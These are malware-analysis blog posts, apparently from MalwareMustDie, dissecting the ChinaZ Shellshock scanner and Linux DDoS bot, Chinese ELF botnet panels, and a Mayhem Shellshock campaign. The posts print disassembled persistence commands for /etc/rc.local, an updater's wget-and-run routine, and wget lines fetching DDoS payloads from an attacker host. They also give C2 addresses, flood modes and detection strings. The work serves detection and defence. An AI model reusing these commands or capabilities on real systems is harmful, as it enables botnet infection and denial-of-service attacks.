Wednesday, January 14, 2015

MMD-0030-2015 New ELF malware on Shellshock: the ChinaZ

The background

The bash Shellshock vulnerability (link) is still proven to be one of the fastest way to spread ELF malware infection to NIX boxes in internet, along with Linux systems which are still having the vulnerable version. This fact that is not knowing only by internet security folks, but by the threat actors themself. Since firstly reported in this blog (link), bash shellshock vulnerabilty exploitation is utilized for more sophisticated ELF malware infection scheme, like Linux/Mayhem malware shellshock distribution (link) or Linux/Xor.DDoS infection scheme (link), and some more in our tweet posts. Now some ELF malware actors in PRC/People Respublic of China are starting to build and use a set of tools to make more ELF infection "merrier" via shellshock exploitation, and they called it as "ChinaZ".

The threat was detected (ITW) on January 13th, 2015, was developed somewhere around November, 2014. And this post is describing how it works with describing threat's details for detection and mitigation.

The infection source

A bash shellshock attack was detected with the following one-liner bash command coming via HTTP request to the victim's Linux box with the below data:

Revealing the existence of their used infection source:

Please noted date and the ChinaZ signature used.

The attacker's IP address is shown matched to the web panel IP itself, with the date that is showing the threat attack activity is in the progress. The file 9521 shown in the web panel is an ELF malware, and the file ck.exe is the accompanied tool, a Windows PE application. If you compare details on the time-stamps and the download hit number carefully you will see that the attacker was gaining much download for this payload, which is telling us that the bash commands sent via HTTP request were actually executed by some affected targets.

The IP address is originated from People Republic of China (shorten as PRC) network with the below data:

IP: 121.12.173.173
ASN: 58543
Network: 121.12.168.0/21
ISP: CHINATELECOM-HUNAN-H | SHENZHENSHILUOHUQUHEPINGLUYIFENGGUANGCHANGCZUO32H

How does it work?

In short: The ch.exe (Win32/ChinaZ.Shellshock) which is running on a compromised (or not) Windows host(s), will spread the hard coded (in its binary) a bash shellshock attack script via HTTP requests to the designated Linux box targets (in IP addresses) which was scanned beforehand, using a defined ELF payload (Linux/ChinaZ.DDoS malware) download URL from the same or other compromised (or not) Windows host(s). The infected Linux system will send callback to a remote Windows CNC application then will run as backdoor and DDoS agent to be remotely controlled by the actors. This traces of the binaries, environment and the threat origin proven us that the threat was built and originated from actor(s) in People Republic of China (PRC).

The attacker tool: ck.exe (Win32/ChinaZ.shellsock)

The file ck.exe is responsible for the Shellshock vulnerability scanning qnd attacking process. The binary static analysis using our favorite tool PEStudio (link)is showing many malicious indicators as per shown below, please see it yourself and I am sure you know how suspicious those signs are too:

Since it's a "fresh" threat, VirusTotal is showing a low detection ratio-->[VirusTotal].

Even we detected this in January 13th, 2015, we suspected the threat was in-the-wild way before that (November 2014), the Windows PE binary build information is showing these facts, again PEStudio (link) is very useful to instantly confirming such information:

Additionally you can see the pdb filename showing the "ShellShock" strings which is a a clear hint for all of us that the actors are building this tool for this specific threat accordingly (I mean don't buy it if there anyone will say to you this is a penetration test tool).

The binary is guarded with some anti-debug functions. The correlation of the attack log that came to the victim's infrastructure to this tool can be shown in the ck.exe binary at the below offset snapshot, noted: I use my favorite tool radare2 (link) to reverse this malware to make sure it has no backdoor nor etc malware that can harm me or our team mates beforehand, showing the intention of the actors who doesn't want this tool to be cracked its purpose easily..

How does this shellshock attacker tool operate?
To our advantage and surprise, --help text is available as per snipped below, making me easier to explain this threat to all of you :-)

↑This is showing the command line usage of ck.exe to launch the shellshock attack with using the target list in a text file, number of thread attack to be used, and the payload to be used to attack the listed hosts. These actors built this PE binary to literally attacking us through a simple and easy windows CUI (command user interface)of shellshock HTTP request.
Please noted that "ChinaZ" signature.

The ELF Payload: 9521 (Linux/ChinaZ.DDoS)

The payload is a stripped ELF 32-bit LSB executable file for Intel 80386, which is statically linked, for GNU/Linux kernel 2.6.26. We uploaded the file into VirusTotal here--> [VirusTotal] and currently is having 8/55 detection ratio, which is good for a new threat (thanks to AV industry for the nice follow).

This ELF is "literally" stripped, and you need to trail spaghetti code to jump within offsets during reversing this one through functions and subs with sometimes through jump cushions to follow with, but it is still a readable one. To understand how it works was taking less time than figuring which variant this malware actually is. The obfuscation in (function/subs) names is making harder to identify, but in the end the new characteristics spotted in codes was showing this sample as a new ELF malware variant, and matched string signature is showing us that this ELF was built specifically for this infection purpose, as per below snapshots:


The ELF infection of a compromised host is started by checking the /etc/rc.local and this malware is modifying it for the startup purpose by the below command (a note from from reversing effort):

0x0804B5CC mov     dword ptr [esp], offset aEtcRc_local ; "/etc/rc.local"
0x0804B5D3 call    sub_804B550 ; //checks the file..(fstat etc..)
0x0804B5D8 mov     [esp], ebx
0x0804B685 mov     dword ptr [esp+4], offset aSedIESDEtcRc_l ; "sed -i -e '/%s/d' /etc/rc.local"
                   ; decoded strings ==>  sed -i -e '/exit/d' /etc/rc.local
    (...)
0x0804B6A5 mov     dword ptr [esp+4], offset aSedIE2ISSEtcRc ; "sed -i -e '2 i%s/%s' /etc/rc.local"
                   ; decoded strings ==> sed -i -e '2 i//ChinaZ' /etc/rc.local
    (...)
0x0804B6BE mov     dword ptr [esp], offset aEtcRc_local ; "/etc/rc.local" 
As per seen above, this malware is depending to "sh" and utilizing "sed" command to install itself. There is no limited Linux box that doesn't have sh and most of UNIX box is having sed command, is a well selected ways to perform installation of (evil) ELF.
Noted: that "ChinaZ" stamp.

This ELF malware is utilizing libresolv and libnss libraries for internet resolve scheme, and the nature of compilation will need the ld and libc as runtime modules (well..obviously..). So in an infected machine you will see the running trace like below, a set of commands like ss, lsof, netstat, sockstat (FreeBSD), tshark and tcpdump will be your best friend to check for infection (for the rooted hosts I always bring my own binaries of these tools..)

COMMAND  PID   TID   USER  FD    TYPE DEVICE SIZE/OFF NODE NAME
MALWARE  32063       USER  cwd   DIR8,1     4096  2 /
MALWARE  32063       USER  rtd   DIR8,1     4096  2 /
MALWARE  32063       USER  txt   REG8,6   618948     1048584 /home/USER/test/MALWARE
MALWARE  32063       USER  mem   REG8,1    71488      260636 /lib/i386-linux-gnu/libresolv-2.13.so
MALWARE  32063       USER  mem   REG8,1    22088      260630 /lib/i386-linux-gnu/libnss_dns-2.13.so
MALWARE  32063       USER  mem   REG8,1   117960      260619 /lib/i386-linux-gnu/ld-2.13.so
MALWARE  32063       USER  mem   REG8,1  1364104      260622 /lib/i386-linux-gnu/libc-2.13.so
MALWARE  32063       USER  mem   REG8,1    42628      260631 /lib/i386-linux-gnu/libnss_files-2.13.so
MALWARE  32063       USER    0u   CHR1,3      0t0      1192 /dev/null
MALWARE  32063       USER    1u   CHR1,3      0t0      1192 /dev/null
MALWARE  32063       USER    2u   CHR1,3      0t0      1192 /dev/null
MALWARE  32063       USER    3u  IPv4   67174236      0t0TCP INFECTED.HOST:36555->121.12.173.173:9521 (ESTABLISHED)
MALWARE  32063 32072 USER  cwd   DIR8,1     4096  2 /
MALWARE  32063 32072 USER  rtd   DIR8,1     4096  2 /
MALWARE  32063 32072 USER  txt   REG8,6   618948    1048584 /home/USER/test/MALWARE
MALWARE  32063 32072 USER  mem   REG8,1    71488      260636 /lib/i386-linux-gnu/libresolv-2.13.so
MALWARE  32063 32072 USER  mem   REG8,1    22088      260630 /lib/i386-linux-gnu/libnss_dns-2.13.so
MALWARE  32063 32072 USER  mem   REG8,1   117960      260619 /lib/i386-linux-gnu/ld-2.13.so
MALWARE  32063 32072 USER  mem   REG8,1  1364104      260622 /lib/i386-linux-gnu/libc-2.13.so
MALWARE  32063 32072 USER  mem   REG8,1    42628      260631 /lib/i386-linux-gnu/libnss_files-2.13.so
(...)
↑ELF ChinaZ will spawn its processes into six or seven forks after initial infection, within each process it sends beacon to the CNC to be received in its CNC management tool, which is most likely in windows platform.

In the recent version the ChinaZ DDoS'er is spawning the original process into different PID, to then performing the connection to the CNC. As per seen in the snapshot we took below. For stopping the process infection of this malware, one should know the PID of the first two processes created, in the example below is: 6719 and 6720.

"The initiate execution of CHinaZ"
MALWARE  6719        USER  cwd  DIR   8,1     4096     260761 /tmp
MALWARE  6719        USER  rtd  DIR   8,1     4096     2 /
MALWARE  6719        USER  txt  REG   8,6  1536701    1048584 /USER/DIR/MALWARE
(SPAWN NEW PROCESS)

"The spawned process ChinaZ, established initial CNC connections"
MALWARE  6720        USER  cwd  DIR   8,1     4096     260761 /tmp
MALWARE  6720        USER  rtd  DIR   8,1     4096     2 /
MALWARE  6720        USER  txt  REG   8,6  1536701    1048584 /USER/DIR/MALWARE
MALWARE  6720        USER    0u     IPv4   79282268      0t0   TCP INFECTED-BOX:46897->xxx:29132 (ESTABLISHED)
MALWARE  6720        USER    1u     IPv4   79282271      0t0   TCP INFECTED-BOX:46898->xxx:29132 (ESTABLISHED)
(CLONE/CHILD PROCESS IS EXECUTED HERE)

"The forked process of ChinaZ with establishing further CNC beacon operations"
MALWARE  6720 6721   USER  cwd  DIR   8,1     4096     260761 /tmp
MALWARE  6720 6721   USER  rtd  DIR   8,1     4096     2 /
MALWARE  6720 6721   USER  txt  REG   8,6  1536701    1048584 /USER/DIR/MALWARE
MALWARE  6720 6721   USER    0u     IPv4   79282268      0t0   TCP INFECTED-BOX:46897->xxx:29132 (ESTABLISHED)
MALWARE  6720 6721   USER    1u     IPv4   79282271      0t0   TCP INFECTED-BOX:46898->xxx:29132 (ESTABLISHED)
MALWARE  6720 6722   USER  cwd  DIR   8,1     4096     260761 /tmp
MALWARE  6720 6722   USER  rtd  DIR   8,1     4096     2 /
MALWARE  6720 6722   USER  txt  REG   8,6  1536701    1048584 /USER/DIR/MALWARE
MALWARE  6720 6722   USER    0u     IPv4   79282268      0t0   TCP INFECTED-BOX:46897->xxxx:29132 (ESTABLISHED)
MALWARE  6720 6722   USER    1u     IPv4   79282271      0t0   TCP INFECTED-BOX:46898->xxxx:29132 (ESTABLISHED)
MALWARE  6720 6723   USER  cwd  DIR   8,1     4096     260761 /tmp
MALWARE  6720 6723   USER  rtd  DIR   8,1     4096     2 /
MALWARE  6720 6723   USER  txt  REG   8,6  1536701    1048584 /USER/DIR/MALWARE
MALWARE  6720 6723   USER    0u     IPv4   79282268      0t0   TCP INFECTED-BOX:46897->xxxx:29132 (ESTABLISHED)
MALWARE  6720 6723   USER    1u     IPv4   79282271      0t0   TCP INFECTED-BOX:46898->xxxx:29132 (ESTABLISHED)
↑Additionally see also the double "established" connection above, which is unique "feature".

The backdoor sent looks as per below, in this particular case it sends the callback to a hostname aa.gm352.com (121.12.173.173 port 9521) at ASN 58543 | 121.12.168.0/21 | CHINATELECOM-HUNAN-H, PoC:

SYSCALL5A, send(3, "cM\1\0\0\1\0\0\0\0\0\0\2aa\5gm352\3com\0\0\1\0\1", 30, MSG_NOSIGNAL)
SYSCALL5B, recvfrom(3, "cM\201\200\0\1\0\1\0\5\0\5\2aa\5gm352\3com\0\0\1\0\1\300\f"..., 1024, 0, 
           $PARAMS:{sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("x.x.x.x")}, [16]) 
SYSCALL5C, connect(3, {sa_family=AF_INET, sin_port=htons(9521), sin_addr=inet_addr("121.12.173.173")}, 16)
SYSCALL5D, write(3, "\0\0\0\0LinuxX.X.X-X-686\0\275w\267\0\1\0\0"..., 168) = 168

// traffic:
Offset    Hex                                              ASCII (redacted)
00000000  00 00 00 00 4c 69 6e 75  78 33 2e 32 2e 30 2d 34 ....Linu xX.X.X-X
00000010  2d 36 38 36 2d 70 61 65  00 1d 7a b7 00 01 00 00 -686.... ..z.....
00000020  48 31 d6 09 48 31 d6 09  00 00 00 00 64 1c 7a b7 H1..H1.. ....d.z.
00000030  00 00 00 00 a0 2e d6 09  90 71 e4 b6 da a4 d0 b6 ........ .q......
00000040  ff ff ff ff 31 20 2a 20  32 35 33 31 4d 48 7a 00 ....1 *  2531MHz.
00000050  40 1c 7a b7 40 8c 0a 08  58 30 d6 09 d0 32 d6 09 @.z.@... X0...2..
00000060  01 00 00 00 31 30 30 32  20 4d 42 00 80 80 e4 b6 ....1002  MB.....
00000070  98 23 d6 09 ff ff ff ff  38 98 d0 b6 da a4 d0 b6 .#...... 8.......
00000080  05 00 00 00 56 49 50 00  40 8c 0a 08 58 30 d6 09 ....VIP. @...X0..
00000090  00 33 d6 09 01 00 00 00  05 00 00 00 00 00 00 00 .3...... ........
000000A0  88 a1 d0 b6 6e 20 01 00                          ....n .. 

Threat Source of this sample

By the time the threat was detected & announced (yesterday) the CNC was up and alive, PoC:

aa.gm352.com.           300     IN      A       121.12.173.173
gm352.com.              3600    IN      NS      ns4.he.net.
gm352.com.              3600    IN      NS      ns3.he.net.
gm352.com.              3600    IN      NS      ns2.he.net.
gm352.com.              3600    IN      NS      ns1.he.net.
gm352.com.              3600    IN      NS      ns5.he.net.
 
$ mycnccheck 121.12.173.173:9521
Connection to 121.12.173.173 9521 port [tcp/*] succeeded!
IPv4   TCP MMD.KickUR.ASS:36555->121.12.173.173:9521 (ESTABLISHED)
Yes we have the same IP used to attack, and the same IP that provided the ELF download, being used as CNC too.

CNC callback traffic

The traffic capture PCAP data generated of the first version of CHinaZ during the infection session is showing a slight differences to the other similar known ELF backdoor/DDoS malware types, as per shown below:

↑this is clearly showing us that we have a new family for the PRC/China ELF malware.

Below is the ELF x64 version sample of ChinaZ's traffic in PCAP, the initiation moment:

In the recent ELF x32 analyzed sample the form for the callback (textual) stream can be viewed as follows, which was sending the uname result and information of the running malware:

UPDATE: The Modular version of ChinaZ

It was spotted by our team (credit: benkow & MMD ELF Team members) a unique modular version of ChinaZ, a pair of DDoS Client in x32 and x64 modules ; and also the Starter/Updater modules in x32 and x64, in a form of dynamic shared library linked ELF. Unlike to its variant that was compiled in static environment, this version is having smaller size (..obviously..). Maybe the purpose for modular separation is for either (1) AV signature mitigation or (2) Further building purpose. These ELFs are running with dependencies to GLIBC 2.x (2.0 and 2.1.3) and seeking for below libraries:

ld-linux.so.2, 
libstdc++.so.6, 
libm.so.6, 
libgcc_s.so.1, 
libc.so.6
and both are sharing the same unix file socket in the below description:
TYPE: unix 0xf586f080  0t0   72473214 socket
FILE: /tmp/.DDosClientUpdater.sock
We suspect it's a pre-distribution version of ChinaZ, yet some of the infected machines showed the direct download efforts like the spotted below:
wget -O /tmp/32.tar.bz2 http://xxxx:2587/32.tar.bz2
wget -O /tmp/64.tar.bz2 http://xxxx:2587/64.tar.bz2
wget -O /tmp/DDosClient http://xxxx:2587/DDosClient.tar.bz2

We will briefly explain how it works as per below, and then you can see it yourself further in the sample we shared in VirusTotal or KernelMode, all are self-explanatory.

The updater "DDosStarter"

This updater is working with the simple logic, to start as daemon, preparing the socket to be used for the update purpose, backing up the porevous version of the main module DDosClient, updates via wget and restart the process of the main module DDosClient

The reverse engineering trails snipped below is showing how it works in details:

// set as daemon..

0x08048AB1 call "_Z11init_daemonv" ; init_daemon(void)
             :
           0x08048A3B call _setsid
           0x08048A40 call _fork
            :
0x08048AB6 mov  dword ptr [esp+8], 200h ; n
0x08048ABE mov  dword ptr [esp+4], 0 ; c
0x08048AC6 lea  eax, [esp+418h]
0x08048ACD mov  [esp], eax   ; s
0x08048AD0 call  _memset
0x08048AD5 mov  dword ptr [esp+8], 200h ; n
0x08048ADD mov  dword ptr [esp+4], 0 ; c
0x08048AE5 lea  eax, [esp+218h]
0x08048AEC mov  [esp], eax   ; s

// clean the prev socket file..

0x08048AEF call "_memset"
0x08048AF4 mov  dword ptr [esp+8], offset aTmp_ddosclient ; "/tmp/.DDosClientUpdater.sock"
0x08048AFC mov  dword ptr [esp+4], offset format ; "rm -rf %s"
0x08048B04 lea  eax, [esp+418h]

// preparing a new socket...

0x08048B0B mov  [esp], eax
0x08048B0E call _sprintf
0x08048B13 lea  eax, [esp+418h]
0x08048B1A mov  [esp], eax
0x08048B1D call  _system
           // socket : prot, type, domain..
0x08048B22 mov  dword ptr [esp+8], 0
0x08048B2A mov  dword ptr [esp+4], 1
0x08048B32 mov  dword ptr [esp], 1
0x08048B39 call    _socket
0x08048B3E mov  [esp+6F8h], eax // set n,c,s
0x08048B45 mov  dword ptr [esp+8], 6Eh
0x08048B4D mov  dword ptr [esp+4], 0
0x08048B55 lea  eax, [esp+686h]
0x08048B5C mov  [esp], ea
0x08048B5F call  _memset
0x08048B64 mov  word ptr [esp+686h], 1 // file op..
0x08048B6E mov  dword ptr [esp+8], 1Dh ; n
0x08048B76 mov  dword ptr [esp+4], offset aTmp_ddosclient ; "/tmp/.DDosClientUpdater.sock"
0x08048B7E lea  eax, [esp+686h]
0x08048B85 add  eax, 2
0x08048B88 mov  [esp], eax ; target
0x08048B8B call  _memcpy
0x08048B90 lea  eax, [esp+686h]
0x08048B97 mov  dword ptr [esp+8], 6Eh; length 
0x08048B9F mov  [esp+4], eax  ; address
0x08048BA3 mov  eax, [esp+6F8h]
0x08048BAA mov  [esp], eax ; file desc

// start the socket bindings..

0x08048BAD call    _bind 
0x08048BB2 mov  dword ptr [esp+4], 5 ; n
0x08048BBA mov  eax, [esp+6F8h]
0x08048BC1 mov  [esp], eax ; bound to..
0x08048BC4 call    _listen ; ..socket.

// stopping all previous DDosClient, chmod 755 new one & restarted...

0x08048BC9 mov  dword ptr [esp], offset command ; "killall DDosClient"
0x08048BD0 call  _system
0x08048BD5 mov  dword ptr [esp], offset aChmodX_Ddoscli ; "chmod +x ./DDosClient"
0x08048BDC call  _system
0x08048BE1 mov  dword ptr [esp], offset a_Ddosclient ; "./DDosClient"
0x08048BE8 call  _system

// connection...

0x08048BED mov  dword ptr [esp+6F4h], 6Eh
0x08048BF8 mov  dword ptr [esp], offset s ; "Wait Online..."
0x08048BFF call    _puts
0x08048C04 lea  eax, [esp+618h]
0x08048C0B lea  edx, [esp+6F4h]
0x08048C12 mov  [esp+8], edx    ; addr_len
0x08048C16 mov  [esp+4], eax    ; addr
0x08048C1A mov  eax, [esp+6F8h]
0x08048C21 mov  [esp], eax   ; fd
0x08048C24 call    _accept
    :

// When connected backup the DDosClient, 
// remove old ones & downloads+chmod 755  new one

0x08048CBD mov  dword ptr [esp+8], 200h
0x08048CC5 mov  dword ptr [esp+4], 0 ; c
0x08048CCD lea  eax, [esp+218h]
0x08048CD4 mov  [esp], eax   ; s
0x08048CD7 call  _memset
0x08048CDC mov  dword ptr [esp], offset aCpF_Ddosclient ; "cp -f ./DDosClient ./DDosClient.back"
0x08048CE3 call  _system
0x08048CE8 mov  dword ptr [esp], offset aRmRf_Ddosclient ; "rm -rf ./DDosClient"
0x08048CEF call  _system
0x08048CF4 lea  eax, [esp+18h]
0x08048CF8 mov  [esp+8], eax
0x08048CFC mov  dword ptr [esp+4], offset aWgetS ; "wget %s"
0x08048D04 lea  eax, [esp+218h]
0x08048D0B mov  [esp], eax   ; value..is here (s)
0x08048D0E call    _sprintf
0x08048D13 lea  eax, [esp+218h]
0x08048D1A mov  [esp], eax   
0x08048D1D call  _system
0x08048D22 test    eax, eax
    :
0x08048D37 mov  dword ptr [esp], offset aChmodX_Ddoscli  ; "chmod +x ./DDosClient"
0x08048D3E call  _system

// rollback upon failures...

0x08048D2B mov  dword ptr [esp], offset aMvDdosclient_b ; "mv DDosClient.back DDosClient"
0x08048D32 call  _system

The DDosClient, the main module is a ChinaZ in dynamic ELF (below are some of known typical functions):

"Stopping a Flood"

0x0804EA14 mov  dword ptr [esp], offset aCommand_ddos_s 
0x0804EA14 ; "COMMAND_DDOS_STOP " <====
0x0804EA1B call _puts
0x0804EA20 mov  g_bStopAtk, 1
0x0804EA2A mov  dword ptr [esp], 1 ; seconds
0x0804EA31 call _sleep
0x0804EA36 mov  CalculatorStop, 1

"Updating/Refreshing Flood Task"

0x0804EA50 mov  dword ptr [esp], offset aCommand_update 
0x0804EA50 ; "COMMAND_UPDATE " <=======
0x0804EA57 call _puts
0x0804EA5C mov  g_bStopAtk, 0
0x0804EA66 mov  dword ptr [esp+8], 7 ; n
0x0804EA6E mov  dword ptr [esp+4], offset aUpdate ; "Update"
0x0804EA76 mov  dword ptr [esp], offset WorkStatus ; dest
0x0804EA7D call _memcpy
0x0804EA82 mov  dword ptr [esp+8], 10h ; n
0x0804EA8A mov  dword ptr [esp+4], offset aPreparing_____
0x0804EA8A ; "Preparing......"
0x0804EA92 mov  dword ptr [esp], offset SendStatus ; dest
0x0804EA99 call _memcpy
0x0804EA9E mov  eax, ds:UpdaterSock
0x0804EAA3 mov  dword ptr [esp+0Ch], 0 ; flags
0x0804EAAB mov  dword ptr [esp+8], 200h ; n
0x0804EAB3 lea  edx, [ebp+s]
0x0804EAB9 add  edx, 4
0x0804EABC mov  [esp+4], edx    ; buf
0x0804EAC0 mov  [esp], eax      ; fd
0x0804EAC3 call _send

"Reading the config (Config.ini)"

0x0804E250  push  ebp
0x0804E251  mov   ebp, esp
0x0804E253  push  ebx
0x0804E254  sub   esp, 44h
0x0804E257  mov   dword ptr [esp+4], offset modes ; "set mode to read"
0x0804E25F  mov   dword ptr [esp], offset aConfig_ini ; "Config.ini"
0x0804E266  call  _fopen ; open the configs..
  :

Attack Vector (thank you for requesting this part)

Below are the ChinaZ DDoS attack capabilities:
1. SYN flood: "Mode(SYN) Target:%s:%d",
2. UDP flood: "MODE(UDP) Target:%s:%d",
3. ICMP flood: "MODE(ICMP) Taregt:%s:%d and
4. DNS Flood: MODE(DNS) Target:%s:%d" (differentiated from DNS amplification attacks)

Is there any Windows OS version for DDosClient?

The answer is yes, we just spotted the windows application of the DDoS agent tool in Windows PE, we called in "Win32/CHinaZ.DDosClient" as per our team tweeted below:

This binary is working similar ways as per ELF version DDoSClient and having the same attack vectors. Our team was uploaded the samples to VT & KM< and I wrote reversing report in the Virus Total as quick reference--> (link), we certainly hope this variant gets better detection ratio soon.

The conclusion

1. We highly suspect that the domain gm352.com is in the possession of the threat's actor for launching this attack.
2. The shellshock vulnerable hosts are still plenty out there, and they are still being abused by malware threat. This infection speed is the PoC that those hosts are serious volume to face for the future threat risk. We must keep on actively reducing their being up and alive in internet.
3. Do not let any of your box services runs or accessed by root privilege, use selinux, runs hardened ssh, and please regularly keep on checking on unusual process/traffic.

The ChinaZ set of samples is shared to the malware research community in--> kernelmode, along with uploading them to Virus Total for improvement in detection ratio.
This detection is a team work of MalwareMustDie on ELF malware threat, many thank's to members who work very hard to detect, taking down and helping on publicity of this threat's awareness.
Feel free to write comments to discuss this matter (don't abuse please), please kindly send us more ELF samples if you find one by clicking this blog's right menu "Dropbox: Send your sample"

Updates

#MalwareMustDie!

Friday, November 7, 2014

China ELF botnet malware infection & distribution scheme unleashed

The background

There are so many ELF malware infection with the multiple type of backdoors and DDoS'ers originated from China. Our report in here -->[link] shows the known 6 (six) types of those DDoS'ers, From the Linux/Elknot, which is the oldest one, the popular ones, following by the Linux/BillGates which having the encrypted dropped backdoor with packet capture and rootkit functions, then the Linux/AES.DDoS that is aiming for the router & embedded architecture (ARM, MIPS, PPC), and we have Linux/IptabLes|x that is messing with the system's autorun by copying itself to the /boot, we have also the Linux/XOR.DDoS which suggesting the coder likes the CTF-like challange. And the last one is the new invented malware using Go language which is designed to infect ARM device: Linux/GoARM.Bot.

During the raising detection effort of these malware, MalwareMustdie found the two types of these malware which are Linux/GoARM.Bot & Linux/XOR.DDoS, thus we are also the one who invented name for Linux/AES.DDoS.

Except the .IptabLes|x, all of those ELF DDoS'er malware was distributing in web panel, a very handy good software called HTTP File Server, known as HFS. And those ELF backdoor/DDoS'er malware were downloaded to a successfully compromised SSH account of the Linux/FreeBSD and being installed as backdoor to perform DDoS operations. You can see the snapshot and videos of those panels in the link described above.

How bad the situation is?

So far we secured 85 web panels loaded by these ELF malwares and its builder and botnet CNC tools, which were served mainly in China network and under 91 IP addresses in total incidents recorded and those panels only using 76 IP addresses in unique counts. All of them are having similar materials, one linked to another panels in usage and tools, so we strongly think at least a coordinated team or group must be operated behind the scene to support this operation.

The suspicion is getting stronger after several evidence was found that was lead to the same modus operation (hint: Remote Desktop Protocol, HFS server, SSH bruters, IP Scanner tools, Botnet CNC tools), same target IP list and the exact same custom scripts which is distributed between the panels. Furthermore, the growth of these panels is very rapid. We can expect 15 new panels in average will be raised in a week. All loaded with the malicious related tools.

In the last operation we managed to neutralize 29 of these evil panels in overall, and now we are facing 35+ panels up and alive already. These are the pace of speed that this threat is actually performing and it's a steady grow. By this pace we can expect more than 100 panels will be taken down in the end of year, but only God will know how much new panels these crooks will make by then.

The answer: The video that is explaining the modus operation of the threat

But how they really operate? How can they manage to make that rapid speed? What is that same modus operation used? It was a mistery before, but now we just found exactly the answer for this question.
During our "research event", we had a chance to record the activity of the player while he was making a remote tutorial, and as a result the video of the tutorial of China actor's activity can be presented to security community, in this post.

Please see well of how they implement the strategy to make builder of an ELF malware (in this case was Elknot used as sample, practically they have many combination of those builders), to use the HFS server, to systematically scan for network for linux server, how they exploit the servers and infect them in an automation. You can see the many combination tools they are using too. This is a real evidence, caught in the act "manual" made by the crooks themself, they don't know that we actually grabbed this, and I hope this will make them bumping their heads to each others in their China crook's land.

Why the threat is fast growing, and large in volume? The actors behind this threat are actually and literally making tutorials, developing easy-to-use tools, transferring the knowledge via (remote) training. You will see in the video picture gallery presented in this post the tools that they made, the list of well-managed ip addresses produced by that tools & shared in the HFS panels, and most of all: the rapid improvement & development of those tools, malware and exploits they use. This facts, friends, raise a huge dilemma: Will individual crooks doing the stuff to be shared as "group basis" like this threat shows? Where the budget for all of these non-cheap-stuff activity was coming from? Why in the 85 panels that was in scattered in internet at various location has the exact same M.O, CNC/hack tools and scripts? (even they tried to camouflage these tools into various icons..it is just too obvious).
One doesn't have to be a super hacker to conclude that is a ONE unison movement pumping this threat. Some of the evidence are accidentally supporting to this deduction, showing the division/unit information (see the following video and gallery).

Below is the video that can answer much of the above questions, it was a pretty hard effort to compile it and we're not the professional video maker, please kindly bear some glitches.
(This is the hard work of the MalwareMustDie ELF Team, on behalf of the members, I must say: please do not use this material, information, clue or hint related to this case without mention to people who work very hard for this awareness. A mention to MalwareMustDie will be very appreciated)

Gallery of the malware builders and attacker tools used

Below is the important collection of picture snapshot our team took, this picture will explain you more than words of the above conclusion we wrote. Each snapshot was taken from the material secured from HFS panels used to distribute the ELF (and windows too) China malware botnet. Please kindly credit to our members who can not be disclosed their ID by mentioning MalwareMustDie.

Addition: China ELF actors start to use ShellShock

Starting from November 7th 2014 they started to aim for Shellshock vulnerability as new technique to infect:

The malware downloaded are the ELF DDoS'er originated from the panels that we mentioned in this post. And in those panel was captured the script used for this infection, with the signature in Chinese: "Nameless Division For Scanning Internet"

Another PoC that can describe teh generated sequential incoming IP attackers came from China "hacked" segment by the hacking toolsets mentioned in the video of this post

Credit: MMD ELF Team: BK (w00t!),WH,WP,SH,YN,(great work!), LVD,AB,AD,RJX,CP (Thank's for always be there!)and many more can not be listed here < Thanks for the great work & superb coordination always.

#MalwareMustDie!

Tuesday, October 7, 2014

MMD-0029-2014 - Warning of Mayhem shellshock attack

We afraid this wave will come during the "shellshock", and it did. The attack wave of "ELF .so malware library", an installer of a known botnet called as "Mayhem" just hit all of us. The attack came from various IP of their botnet into many NIX services, utilizing the shellshock web vulnerability scan method to download the remote installer written in Perl (replacing the previous PHP base infection). It is obviously a new different vector for Mayhem infection, we start calling it as Mayhem Shellshock version of attack.
Thank to @yinettesys (credit: link) for the quick alert & attack vector information, a good work and solid contribution to the community.

The attack

First detection:

2014-10-2 12:51:38 Zulu (UTC)

Payload attack first spotted:

2014-10-5 17:47:16 Zulu (UTC)

Pre-attack Shellshock Scanning PoC:

Payload installation attempt PoC (one-liner Shellshock)

Or as per this pastebin-->[here]

It shows the multiple url to download the Perl installer of Mayhem initial library (the Mayhem installer .so file) from remote host, to be saved in /tmp directory, to be executed after chmod with the 755 permission, under your web server daemon unix user privilege.

Attack grep/detection mitigation method advised:

"expr 1330 + 7"

The scheme:
The first scanner is probing the shellshock vulnerable hosts/network and it has two patterns of shellshock query sent (see the first picture above). The botnet will receive the response of the scanning and sending the infection part of shellshock script (see the second picture above), the one with the wget to download the Perl installer script. The script will be executed in /tmp to execute the ELF .so library and delete it after being executed, so there is no remote file accessed to trigger the infection (unlike the PHP installer version). The .so binaries will be loaded in memory by LD_PRELOAD and stay resident to perform the further botnet operation.

Infection

The url in the one-liner script will lead to the Perl script installer of the Mayhem installer library:

The wget logs is showing that the host is still up and alive by the time this post was written:

The 404.cgi file is the Perl installer of the malware library, the neutralized code can be viewed below:

or in this pastebin-->[here]

This script does the same functionality as previous version in PHP, it is just a Perl version which is having x32 and x64 ELF binary file in hex data to be injected into a file via CGI permission on the targeted UNIX OS and run the libs with LD_PRELOAD using the related library (if needed), FYI: the executable process in this installer also will run with your web server daemon unix privilege.

To get the binary, you will need to use the patched that Perl script to save the binaries written in hex, we scratched one, be free to use, modify or improve this script: (click to copy & paste)

If you run it, you will get the malware library files to be used for the reporting or analysis purpose:

Mayhem installer (ELF DYN ".so" LD_PRELOAD)

Below is the hashes & file type of samples we collected in one incident:

$ md5 *.so
MD5 (sess32.so) = 'd5d4cb6dc0eaace5e31dfd32eaf63ae7'
MD5 (sess64.so) = 'd3d96ec99429ff70ab84f2a8cf21067f'

$ file *.so
sess32.so: ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, corrupted section header size
sess64.so: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, corrupted section header size
$
These samples we uploaded in VT in here--> [-1-] and [-2-]

Generally the ELF malware itself work as per previous version mentioned in our post here [-3-] and Yandex team reported research in here [-4-]. But we are suspecting there are changes in the "scanner/spider module" of Mayhem component that is utilizing Shellshock web query/request to send the detected scanning or infection (this is not being confirmed yet..we are lacking of samples, details will be added/updated) .

In the binary dropped by the Perl installer (pls extract the binary first), or in the malicious .so files spotted in the infected machine, you can see these strings which will help you to recognize it as the malware:

0x067BA     R,%d,%d,%d,%s,%s,
0x067CD     P,%u,%u,%u,%u,%u
0x067DF     "POST %s HTTP/1.0"
0x067F1     Host: %s
0x067FB     "Pragma: 1337" <================
0x06809     Content-Length: %d
0x06834     %s/%s
0x0688F     /dev/null <=== spawn..
0x06899     %s/%c.%d
0x068A5     (null)    <=== spawn
